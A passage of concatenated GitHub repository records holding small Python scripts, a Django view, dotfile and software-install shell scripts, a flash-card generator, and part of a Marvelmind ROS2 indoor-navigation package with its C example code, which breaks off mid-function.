Network. \n\ntokenize--->>This function will return tokenize the sentence E.g. tokenize('Jaya went to the temple. Where does Jaya gone?')\n['Jaya' , 'went' , 'to' , 'the' , 'temple' , '.' ,'Where' , 'does' , 'Jaya' , 'gone' , '?' ]\n\n\nget_stories--->>This function will convert all the sentences of a given file into a single story , also stories longer than maximum length are pruned.\n\nHow We Actually Implemeted this??\n\n1> Download the bAbi Dataset, from the given link in the code.\nSample bAbi DataSet>>\n\n1 John Went to the temple.\n2 Denial followed John.\n3 Enna finally went to kitchen.\n4 Where does John went? temple 1\n\nSo, 1 in the neighbourhood of temple indicate that which statment will support this answer.\n\n2> Tokenize the sentence using the utf format.\n\n\n3> prune the dataset.\n\n4> create the three arrays storyArray,QuestionArray,AnswerArray.\n\n5>Vectorize these arrays.\n\n6>Give these Arrays to the LSTM neural network.\n\n7>Training is done on 10000 data sample and validation on 1000dataset.\n\n8>Save the model.\n\n9>plot the graphs for Accuracy and Loss.\n\n\n\n\n\n"
}
] | 2 |
djangopython000/Remotrepo5
|
https://github.com/djangopython000/Remotrepo5
|
54693c8ae086c69778d29ca39ed9b172e7abf774
|
864d24f7b859844999384de291f75dfc9412d4c8
|
5fd9591f9afb64d36ea373637429d1aa43ae1c77
|
refs/heads/master
| 2020-07-15T21:59:43.620024 | 2019-09-01T09:46:22 | 2019-09-01T09:46:22 | 205,657,099 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7306272983551025,
"alphanum_fraction": 0.7453874349594116,
"avg_line_length": 21.58333396911621,
"blob_id": "e46ea0bd6c6e18d4e815bea5374d522f4aba86a4",
"content_id": "933fc449a9830d039f8c10b01ac9e844e330c46b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 12,
"path": "/date/timeapp/views.py",
"repo_name": "djangopython000/Remotrepo5",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http.response import HttpResponse\nimport datetime as dt\ndate1=dt.datetime.now()\n\n\ndef dateview(request):\n\n x=\"<h1>the current date and time is {}</h1>\".format(date1)\n return HttpResponse(x)\n\n# Create your views here.\n"
}
] | 1 |
gd50302n/CIS-101
|
https://github.com/gd50302n/CIS-101
|
fc6ab5e2564355343e2ae6ec51939c5ced7b7f2d
|
8646f389de8d681953fbcf9e12acde57cbf3ed24
|
5c8811fcfba0295b85c377ffd0a430dfdb742835
|
refs/heads/master
| 2020-09-15T11:43:38.755186 | 2019-11-22T15:48:11 | 2019-11-22T15:48:11 | 223,435,259 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5980629324913025,
"alphanum_fraction": 0.6101694703102112,
"avg_line_length": 21.94444465637207,
"blob_id": "b7b77d7d3fe963d9f692d2834bc384847edeab24",
"content_id": "b1a9b264636e477685fc3950d3e83ddd26d6da60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 413,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 18,
"path": "/thanksgiving.py",
"repo_name": "gd50302n/CIS-101",
"src_encoding": "UTF-8",
"text": "import random\n\na = 30\nb = int(input (\"How many people might show up?\"))\nc = random. randint (1,16)\n\nfood = [\"turkey\", \"Apple pie\",\"mashed patatoes\",\"Mac and Cheese\"]\n\ntotal = a + b + c\n\nprint (\"Welcome to my program for thanksgiving\")\n\nanswer = \"n\"\n\nwhile answer != \"y\":\n for item in food:\n print (\"we need \" + str (total) + \" \" + item)\n answer = input (\"Do you want to keep going? Type y to exit.\")\n"
}
] | 1 |
oliveratutexas/dotfiles
|
https://github.com/oliveratutexas/dotfiles
|
935c3c442a265a0c2d2b12f350646902cda20cb5
|
e618207c4dcd92d94c01829f52693a9a7f9ac843
|
58cc7489f0fa3f1860240da1e95e72a0b1462fd9
|
refs/heads/master
| 2018-03-23T20:44:28.401852 | 2017-03-23T21:39:37 | 2017-03-23T21:39:37 | 11,874,937 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.68373703956604,
"alphanum_fraction": 0.68373703956604,
"avg_line_length": 31.11111068725586,
"blob_id": "7e255abae201a5d589d897561ea1d9b1affec120",
"content_id": "64bde564ee9a9543a941b41b2d84b29686e47c34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1445,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 45,
"path": "/make-symlinks.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n############################\n# .make.sh\n# This script creates symlinks from the home directory to any desired dotfiles in ~/dotfiles\n############################\n\n########## Variables\n\ndir=~/dotfiles # dotfiles directory\nolddir=~/dotfiles_old # old dotfiles backup directory\nfiles=\"config SpaceVim spacemacs oh-my-zsh jrnl_config zshrc zsh gitconfig inputrc bashrc vimrc tmux.conf nvim nvimrc profile bash_profile bash_it ycm_extra_conf.py\" \n# private scrotwm.conf Xresources oh-my-zsh zshrc\" # list of files/folders to symlink in homedir\n\n##########\n\n# create dotfiles_old in homedir\necho -n \"Creating $olddir for backup of any existing dotfiles in ~ ...\"\nmkdir -p $olddir\necho \"done\"\n\n\n# change to the dotfiles directory\necho -n \"Changing to the $dir directory ...\"\ncd $dir\necho \"done\"\n\necho \"Don't forget to use the best and latest version of pandoc!\"\n\n#This is to make sure spacevim works for both vim and nvim\n# move any existing dotfiles in homedir to dotfiles_old directory, \n# then create symlinks from the homedir to any files in the \n# ~/dotfiles directory specified in $files\nfor file in $files; do\n echo \"Moving any existing dotfiles from ~ to $olddir\"\n mv ~/.$file ~/dotfiles_old/\n echo \"Creating symlink to $file in home directory.\"\n ln -s $dir/$file ~/.$file\ndone\n\n#Make accomodations for spacevim\nln -sf SpaceVim vim \nln -sf SpaceVim config/nvim \n\n\nchsh -s $(which zsh)\n"
},
{
"alpha_fraction": 0.5032154321670532,
"alphanum_fraction": 0.5080385804176331,
"avg_line_length": 26.622222900390625,
"blob_id": "067150126c0a1b58d88accd17a604dcb368e52e8",
"content_id": "fe54a0b5e2f58c2a0e2c9c7e489ed9d06fa6fe0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1244,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 45,
"path": "/card_cutter/flash_cards_tests.py",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "import unittest\nimport re\n\nkeyboard_keys = '\\w' + re.escape('!\"#$%&\\'()*+,\\-./:;<=>?@\\[]^_`{|}~')\nkeyboard_keys = '[' + keyboard_keys + ']'\n# keyboard_keys = '\\w!\\\"#$%&\\'\\(\\)\\*+,'\nflags = re.VERBOSE | re.MULTILINE\n\n\nclass RegexTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.keyboard_regex = re.compile(keyboard_keys)\n print('regex expression:')\n print(self.keyboard_regex.pattern)\n print()\n\n def test1(self):\n '''\n Just for reggo letters.\n '''\n for char in range(ord('a'), ord('z') + 1):\n srchStrng = '' + chr(char)\n results = self.keyboard_regex.findall('' + chr(char))\n self.assertTrue(results)\n self.assertEqual(results[0], srchStrng)\n\n def test2(self):\n '''\n All those hard keyboard characters are now finally not a thing.\n '''\n for c in '!\"#$%&\\'()*+,\\-./:;<=>?@\\[]^_`{|}~':\n # print('' + c)\n srchStrng = '' + chr(c)\n results = self.keyboard_regex.findall('' + chr(c))\n self.assertTrue(results)\n self.assertEqual(results[0], srchStrng)\n\n def test3(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n\n"
},
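The tests above hinge on `re.escape` turning raw punctuation into a safe character class. As a quick standalone illustration of why the escaping matters (not part of the test file; the sample input is invented):

```python
import re

# Without re.escape, characters such as ']' and '-' would change the
# meaning of the character class; escaped, they are matched literally.
punct = '!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~'
keyboard = re.compile('[\\w' + re.escape(punct) + ']')

print(keyboard.findall('a-z [ok]'))  # every visible character matches; spaces do not
```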
{
"alpha_fraction": 0.790123462677002,
"alphanum_fraction": 0.8055555820465088,
"avg_line_length": 28.454545974731445,
"blob_id": "4a3d46288bca862de18bb04705422b36324d8532",
"content_id": "51455bdd9d5d2fc6d956c5c0ad1e1561b6358b03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 11,
"path": "/install_scripts/flux.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "# Install dependencies\nsudo apt-get install git python-appindicator python-xdg python-pexpect python-gconf python-gtk2 python-glade2 libxxf86vm1\n\n# Download xflux-gui\ncd /tmp\ngit clone \"https://github.com/xflux-gui/xflux-gui.git\"\ncd xflux-gui\npython download-xflux.py\n\n# EITHER install globally\nsudo python setup.py install\n"
},
{
"alpha_fraction": 0.7941176295280457,
"alphanum_fraction": 0.7941176295280457,
"avg_line_length": 33,
"blob_id": "e31fa85aad6bc2e7f7eb2c7b60bee61fe11c8d35",
"content_id": "279960044b6dc7a3fdb9465d38706dba55e58efd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 3,
"path": "/install_scripts/spacemacs_react.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "npm install -g tern\nnpm install -g eslint babel-eslint eslint-plugin-react\nnpm install -g js-beautify\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7850637435913086,
"avg_line_length": 31.294116973876953,
"blob_id": "5da0f5e2d7ba5df4929365112bc27c2a4ac49d0d",
"content_id": "072b39669692b6327f9be5ae985fbfa0cf33a30c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 17,
"path": "/install_scripts/docker.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "sudo apt-get update\nsudo apt-get install apt-transport-https ca-certificates\nsudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D\n\necho \"deb https://apt.dockerproject.org/repo ubuntu-xenial main\" > /etc/apt/sources.list.d/docker.list\n\nsudo apt-get update\nsudo apt-get purge lxc-docker\napt-cache policy docker-engine\nsudo apt-get upgrade\nsudo apt-get update\nsudo apt-get install linux-image-extra-$(uname -r)\n\nsudo apt-get update\nsudo apt-get install docker-engine\nsudo service docker start\nsudo docker run hello-world\n"
},
{
"alpha_fraction": 0.5712965130805969,
"alphanum_fraction": 0.5768430829048157,
"avg_line_length": 28.630136489868164,
"blob_id": "3a4a0169460af4f1f6e84cab5a6aa0f93196db9d",
"content_id": "635bd7635b1e67e14c33acd20b100a782afe44a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4327,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 146,
"path": "/card_cutter/add_flash_cards.py",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "import re\nimport os\n# import requests\nimport pickle\nimport subprocess\nimport time\nimport random\nimport sys\n\n# from html2text import html2text\n# from html2text_overrides import escape_md_section_override\n\nimport csv\n# import datetime.datetime.now()\nfrom os import listdir\n\nold_cards = dict()\nBASE_URL = \"https://ankiweb.net/edit/\"\nFILE_DELIM = '|'\n\ndef remove_indention(blk_string):\n '''\n The minimum amount of spaces preceding a line over all the lines will be trimmed from every line.\n Skips lines that contain no characters other than spaces or tabs.\n Ex. If 2 spaces precede one line, and the rest have 4 preceding, then 2\n spaces will be trimmed from ALL the lines.\n\n TODO - beware of the case of mixed tabs and spaces. I think for that case I\n should count the tabs and spaces and remove the appropriate count of each accordingly.\n '''\n min_num = sys.maxint\n lines = blk_string.splitlines()\n\n for lin in lines:\n if(lin.isspace()):\n continue\n pos = 0\n cnt = 0\n\n while(True):\n if(lin[pos] == ' '):\n cnt += 1\n pos += 1\n else:\n break\n\n if(cnt < min_num):\n min_num = cnt\n\n for ind in range(len(lines)):\n if(lines[ind].isspace()):\n continue\n else:\n # print(\"before\\n\",lst[ind])\n lines[ind] = lines[ind][min_num:]\n # print(\"after\\n\",lst[ind])\n\n return ''.join(lines)\n\n\n# Yanked from utility.py in the anki extension for supplementary buttons.\ndef md_to_html(clean_md):\n \"\"\"\n Take a string `clean_md` and return a string where the Markdown syntax is\n converted to HTML.\n \"\"\"\n new_html = ''\n with open('temp.md', 'w') as tempMdFile:\n tempMdFile.write(clean_md)\n # with open('md.temp','r+') as outTempMdFile:\n\n # input('wait for pandoc')\n subprocess.call('pandoc -s temp.md -o temp.html'.split())\n # input('after pandoc')\n\n with open('temp.html', 'r+') as termHTML:\n new_html = termHTML.read()\n # termHTML.truncate()\n\n subprocess.call('rm -f temp.html'.split())\n\n return new_html\n\n\ndef add_cards():\n home_path = os.path.expanduser('~') + '/Google Drive/JRNL_FILES/'\n keyboard_keys = '\\w' + re.escape('!\"#$%&\\'()*+,\\-./:;<=>?@\\[]^_`{|}~\\'')\n my_whitespace = '\\ \\t'\n flags = re.VERBOSE | re.MULTILINE\n match_pattern = re.compile(r\"\"\"\n #The entire first term\n (\n #Must begin with a keyboard key.\n (?:(?:^[{keyb}]+[{whtspc}{keyb}]*$\\n)\n #followed by (maybe or maybe not, a newline)\n (?:\\n){{0,2}})+\n )\n #Match the indentended second term\n (\n # Begins with whitespace, then non-whitespace, then whatever until a\n # newline\n (?:^[{whtspc}]+[{keyb}]+[{keyb}{whtspc}]*$\\n)+\n )\n \"\"\".format(keyb=keyboard_keys, whtspc=my_whitespace), flags)\n print(match_pattern.pattern)\n allowed_files = [\"notes\"]\n allowed_files = [x + \".md\" for x in allowed_files]\n print(\"RUNNING\")\n allowed_files = [file for file in listdir(home_path) if file in allowed_files]\n for file_name in allowed_files:\n\n cards = set()\n term = []\n definition = []\n\n with open(home_path + file_name) as jrnl_file:\n jrnl_text = jrnl_file.read()\n group_iter = match_pattern.findall(jrnl_text)\n #removes indentation so that everything isn't \"markdown code\" when it isn't intended to be.\n group_iter = [(md_to_html(p1),md_to_html(remove_indention(p2))) for p1,p2 in group_iter]\n\n with open(file_name + '.csv', 'w+') as csvfile:\n # print('csvfile', csvfile)\n writer = csv.writer(csvfile, delimiter=FILE_DELIM)\n for pair in group_iter:\n # is there a more efficient way of doing this? 
\n writer.writerow([pair[0], pair[1]])\n print(\"file_name: \", file_name)\n print('num cards:', len(group_iter))\n\ndef update_cards():\n '''\n TODO: Finish\n Pulls cards from online.\n '''\n with open(\"all_cards.pickle\") as all_cards_pickle:\n old_cards = pickle.load(all_cards_pickle)\n\n\nif __name__=='__main__':\n # post_cards()\n # print(\"Hello World\")\n # a = [100,100]\n\n\n add_cards()\n\n"
},
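The hand-rolled `remove_indention` above strips the common leading indentation so that indented flash-card definitions are not rendered as Markdown code blocks. For the common case the standard library already does this: `textwrap.dedent` removes the longest common leading whitespace and, like the original, ignores whitespace-only lines (a sketch with invented sample text; like the original, it does not handle mixed tabs and spaces specially):

```python
import textwrap

block = """\
    first line of a definition
      a more indented continuation
    back to the base level
"""
print(textwrap.dedent(block))  # common 4-space prefix removed, newlines preserved
```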
{
"alpha_fraction": 0.5675675868988037,
"alphanum_fraction": 0.5675675868988037,
"avg_line_length": 18.66666603088379,
"blob_id": "eccf4a995fb593709c33501dc23c87a9b988c00a",
"content_id": "f4250a2b59e3019c2ea52a447752ea432294b473",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 296,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 15,
"path": "/install_mgr.py",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "\nclass Category:\n '''\n Category Holder\n '''\n def __init__():\n pass\n\nif __name__=='__main__':\n \n #If there's a pickle file for the categorires, fill that in\n #If theere's not, generate one\n #Is there an API to identify the model of a specific laptop?\n \n\n pass\n"
}
] | 7 |
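`install_mgr.py` above is only a stub, but its comments sketch a plan: load the category list from a pickle file if one exists, otherwise generate and save a fresh one. A minimal load-or-create sketch of that idea (the `categories.pickle` file name and the dict shape are assumptions, not taken from the stub):

```python
import os
import pickle

PICKLE_PATH = "categories.pickle"  # assumed file name, not in the stub

def load_or_create_categories():
    # If there's a pickle file for the categories, fill that in
    if os.path.exists(PICKLE_PATH):
        with open(PICKLE_PATH, "rb") as f:
            return pickle.load(f)
    # If there's not, generate one
    categories = {}  # e.g. category name -> list of install scripts
    with open(PICKLE_PATH, "wb") as f:
        pickle.dump(categories, f)
    return categories
```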
aminballoon/ros_marvelmind_package
|
https://github.com/aminballoon/ros_marvelmind_package
|
e00be66636d59eaef32f1691d1b5560781ffa93a
|
ca42a11d8c4205f0b15027eb32495b8abeddab52
|
53d1844bccada64ed3578d9afdd9c8b601fb9a7f
|
refs/heads/master
| 2023-08-18T21:51:40.580091 | 2021-10-13T09:06:44 | 2021-10-13T09:06:44 | 416,161,213 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7676767706871033,
"alphanum_fraction": 0.7838383913040161,
"avg_line_length": 54,
"blob_id": "3160ff244c5263dec303411d36752e742eb92910",
"content_id": "669bc79af1f4e0ea32a3a0c81103be6c169def37",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 495,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 9,
"path": "/marvelmind_nav/README.md",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "# Marvelmind ROS2 Package\n\nThis package is an attempt to port the [ros_marvelmind_package](https://bitbucket.org/marvelmind_robotics/ros_marvelmind_package/src/master/)\nfrom ROS to ROS2. All rights as mentioned by the License belong to Marvelmind.\n\n\n## TODOS\n1. Upgrade launch file to use LaunchCOnfiguration/LaunchArguments\n2. Upgrade port and baud to params and load on `on_configure()` to make it more robust. Can be done once [this issue](https://github.com/ros2/rclcpp/issues/855) is fixed\n"
},
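TODO 1 in the README above asks for `LaunchConfiguration`/`LaunchArgument` support. A minimal sketch of what that could look like, modeled on the package's existing `marvel_base_launch.py`; the `port` argument name, the Foxy-style `executable`/`name`/`namespace` keys, and passing the port as a command-line argument are all assumptions, not the package's actual implementation:

```python
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch.substitutions import LaunchConfiguration
from launch_ros.actions import LifecycleNode

def generate_launch_description():
    return LaunchDescription([
        # Expose the serial port as a launch argument instead of hard-coding it
        DeclareLaunchArgument('port', default_value='/dev/ttyACM0'),
        LifecycleNode(package='marvelmind_nav', executable='marvelmind_nav',
                      name='lc_marvel2', namespace='', output='screen',
                      arguments=[LaunchConfiguration('port')]),
    ])
```

This would allow `ros2 launch marvelmind_nav marvel_base_launch.py port:=/dev/ttyACM1` without editing the file.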
{
"alpha_fraction": 0.5292283296585083,
"alphanum_fraction": 0.5497533082962036,
"avg_line_length": 25.90389633178711,
"blob_id": "9e668b089e7455bb3fb8ec1e892b9a61efc2c3b4",
"content_id": "aff028609cff1a1c0f2cab546511f893768316b4",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 21486,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 770,
"path": "/marvelmind_nav/src/marvelmind_example.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#ifdef WIN32\r\n#include <windows.h>\r\n#endif // WIN32\r\n#include \"marvelmind_nav/marvelmind_example.h\"\r\n#include \"marvelmind_nav/marvelmind_devices.h\"\r\n#include \"marvelmind_nav/marvelmind_utils.h\"\r\n#include \"marvelmind_nav/marvelmind_pos.h\"\r\n\r\ntypedef enum {\r\n waitPort, waitDevice, connected\r\n} ConState;\r\nConState conState= waitPort;\r\n\r\nMMDeviceType deviceTypeUSB= unknown;\r\n\r\nMarvelmindDeviceVersion usbDevVersion;\r\n\r\n/////////////////////////////////////////////////////////////////////\r\n\r\nstatic void switchToConState(ConState newConState);\r\n\r\n// Reopen port\r\nstatic void marvelmindReopenPort() {\r\n mmClosePort();\r\n switchToConState(waitPort);\r\n}\r\n\r\n// Reads Marvelmind API version\r\nbool marvelmindCheckVersionCommand(char *token1) {\r\n if (strcmp(token1,\"version\") != 0)\r\n return false;\r\n\r\n uint32_t version= 0;\r\n if (mmAPIVersion(&version)) {\r\n printf(\"Marvelmind API version: %d\\r\\n\", (int) version);\r\n } else {\r\n printf(\"Marvelmind API version read failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute wake command\r\nbool marvelmindCheckWakeCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"wake\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n\r\n\r\n if (address == 0){\r\n mmWakeDevice(address);\r\n printf(\"Wake command was sent\\r\\n\");\r\n return false;\r\n }\r\n else if (mmWakeDevice(address)) {\r\n printf(\"Wake command was sent\\r\\n\");\r\n return false;\r\n\r\n } else {\r\n printf(\"Wake command failed\\r\\n\");\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute sleep command\r\nbool marvelmindCheckSleepCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"sleep\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n uint8_t address= atoi(token2);\r\n if (address == 0){\r\n mmSendToSleepDevice(address);\r\n printf(\"Sleep command was sent\\r\\n\");\r\n return false;\r\n }\r\n else if (mmSendToSleepDevice(address)) {\r\n printf(\"Sleep command was sent\\r\\n\");\r\n } else {\r\n printf(\"Sleep command failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute 'default' command - set default setings\r\nbool marvelmindCheckDefaultCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"default\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n if (mmSetDefaultSettings(address)) {\r\n printf(\"Default settings command was sent\\r\\n\");\r\n } else {\r\n printf(\"Default setings command failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and executer read beacon telemetry command\r\nbool marvelmindCheckTelemetryCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"tele\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n\r\n MarvelmindBeaconTelemetry tele;\r\n\r\n if (mmGetBeaconTelemetry(address, &tele)) {\r\n printf(\"Beacon %d telemetry:\\r\\n\", (int) address);\r\n printf(\" Working time: %d sec\\r\\n\", (int) tele.worktimeSec);\r\n printf(\" RSSI: %d dBm\\r\\n\", (int) tele.rssi);\r\n printf(\" Voltage: %.3f V\\r\\n\", (float) tele.voltageMv/1000.0);\r\n printf(\" Temperature: %d C\\r\\n\", (int) tele.temperature);\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Read and show submap settings\r\nbool 
marvelmindShowSubmapSettings(uint8_t submapId) {\r\n MarvelmindSubmapSettings sm;\r\n if (!mmGetSubmapSettings(submapId, &sm)) {\r\n return false;\r\n }\r\n\r\n uint8_t i;\r\n\r\n printf(\"Submap %d settings:\\r\\n\", (int) submapId);\r\n\r\n if (sm.frozen) {\r\n printf(\" Submap is FROZEN\\r\\n\");\r\n } else {\r\n printf(\" Submap is not frozen\\r\\n\");\r\n }\r\n if (sm.locked) {\r\n printf(\" Submap is locked\\r\\n\");\r\n } else {\r\n printf(\" Submap is not locked\\r\\n\");\r\n }\r\n if (sm.beaconsHigher) {\r\n printf(\" Stationary beacons higher than mobile\\r\\n\");\r\n } else {\r\n printf(\" Stationary beacons lower than mobile\\r\\n\");\r\n }\r\n if (sm.mirrored) {\r\n printf(\" Submap is mirrored\\r\\n\");\r\n } else {\r\n printf(\" Submap is not mirrored\\r\\n\");\r\n }\r\n\r\n printf(\" Starting beacon trilateration: %d\\r\\n\", (int) sm.startingBeacon);\r\n printf(\" Starting set: %d; %d;%d;%d\\r\\n\",\r\n (int) sm.startingSet_1, (int) sm.startingSet_2, (int) sm.startingSet_3,(int) sm.startingSet_4);\r\n printBoolEnabled(\" 3D navigation\", sm.enabled3d);\r\n printBoolEnabled(\" Only for Z coordinate\", sm.onlyForZ);\r\n if (sm.limitationDistanceIsManual) {\r\n printf(\" Limitation distances: manual\\r\\n\");\r\n printf(\" Maximum distance, m: %d\\r\\n\", sm.maximumDistanceManual_m);\r\n } else {\r\n printf(\" Limitation distances: auto\\r\\n\");\r\n }\r\n\r\n printf(\" Submap X shift, m: %.2f\\r\\n\", (float) sm.submapShiftX_cm/100.0);\r\n printf(\" Submap Y shift, m: %.2f\\r\\n\", (float) sm.submapShiftY_cm/100.0);\r\n printf(\" Submap Z shift, m: %.2f\\r\\n\", (float) sm.submapShiftZ_cm/100.0);\r\n printf(\" Submap rotation, degrees: %.2f\\r\\n\", (float) sm.submapRotation_cdeg/100.0);\r\n\r\n printf(\" Plane rotation quaternion: W=%d, X=%d, Y=%d, Z=%d\\r\\n\",\r\n (int) sm.planeQw, (int) sm.planeQx, (int) sm.planeQy, (int) sm.planeQz);\r\n\r\n printf(\" Service zone thickness, m: %.2f\\r\\n\", (float) sm.serviceZoneThickness_cm/100.0);\r\n printf(\" Hedges height in 2D mode, m: %.2f\\r\\n\", (float) sm.hedgesHeightFor2D_cm/100.0);\r\n\r\n printf(\" Beacons in submap: \");\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n if (sm.beacons[i]!=0) {\r\n printf(\"%d \", (int) sm.beacons[i]);\r\n }\r\n }\r\n printf(\"\\r\\n\");\r\n\r\n printf(\" Nearby submaps: \");\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n if (sm.nearbySubmaps[i]!=255) {\r\n printf(\"%d \", (int) sm.nearbySubmaps[i]);\r\n }\r\n }\r\n printf(\"\\r\\n\");\r\n\r\n printf(\" Service zone: \");\r\n if (sm.serviceZonePointsNum == 0) {\r\n printf(\"none \\r\\n\");\r\n } else {\r\n for(i=0;i<sm.serviceZonePointsNum;i++) {\r\n ServiceZonePoint p= sm.serviceZonePolygon[i];\r\n printf(\"X= %.2f, Y= %.2f \", (float) p.x/100.0, (float) p.y/100.0);\r\n }\r\n printf(\"\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Test function for writing submap settings\r\nbool marvelmindTestSetSubmapSettings(uint8_t submapId) {\r\n MarvelmindSubmapSettings sm;\r\n\r\n uint8_t i;\r\n\r\n sm.frozen= true;\r\n sm.locked= true;\r\n sm.beaconsHigher= false;\r\n sm.mirrored= false;\r\n\r\n sm.startingBeacon= 9;\r\n\r\n sm.enabled3d= true;\r\n sm.onlyForZ= true;\r\n sm.limitationDistanceIsManual= true;\r\n sm.maximumDistanceManual_m= 19;\r\n\r\n sm.submapShiftX_cm= 987;\r\n sm.submapShiftY_cm= -654;\r\n sm.submapShiftZ_cm= 321;\r\n\r\n sm.submapRotation_cdeg= 10423;\r\n\r\n sm.planeQw= 10000;\r\n sm.planeQx= 0;\r\n sm.planeQy= 0;\r\n sm.planeQz= 0;\r\n\r\n sm.serviceZoneThickness_cm= -500;\r\n\r\n sm.hedgesHeightFor2D_cm= 
350;\r\n\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n sm.beacons[i]= 0;\r\n }\r\n sm.beacons[0]= 9;\r\n sm.beacons[1]= 10;\r\n\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n sm.nearbySubmaps[i]= 255;\r\n }\r\n sm.nearbySubmaps[0]= 2;\r\n\r\n sm.serviceZonePointsNum= 4;\r\n sm.serviceZonePolygon[0].x= 100;\r\n sm.serviceZonePolygon[0].y= 150;\r\n sm.serviceZonePolygon[1].x= -220;\r\n sm.serviceZonePolygon[1].y= 130;\r\n sm.serviceZonePolygon[2].x= -250;\r\n sm.serviceZonePolygon[2].y= -80;\r\n sm.serviceZonePolygon[3].x= 154;\r\n sm.serviceZonePolygon[3].y= -120;\r\n\r\n if (!mmSetSubmapSettings(submapId, &sm)) {\r\n printf(\"Submap %d settings sending error\\r\\n\", (int) submapId);\r\n return false;\r\n }\r\n\r\n printf(\"Submap %d settings sending success\\r\\n\", (int) submapId);\r\n\r\n return true;\r\n}\r\n\r\n// Check and executer submap command (add submap, delete submap etc)\r\nbool marvelmindCheckSubmapCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"submap\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n uint8_t submapId= atoi(token3);\r\n\r\n if (strcmp(token2,\"add\") == 0) {\r\n if (mmAddSubmap(submapId)) {\r\n printf(\"Submap %d added\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d add failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"delete\") == 0) {\r\n if (mmDeleteSubmap(submapId)) {\r\n printf(\"Submap %d deleted\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d delete failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"freeze\") == 0) {\r\n if (mmFreezeSubmap(submapId)) {\r\n printf(\"Submap %d freeze 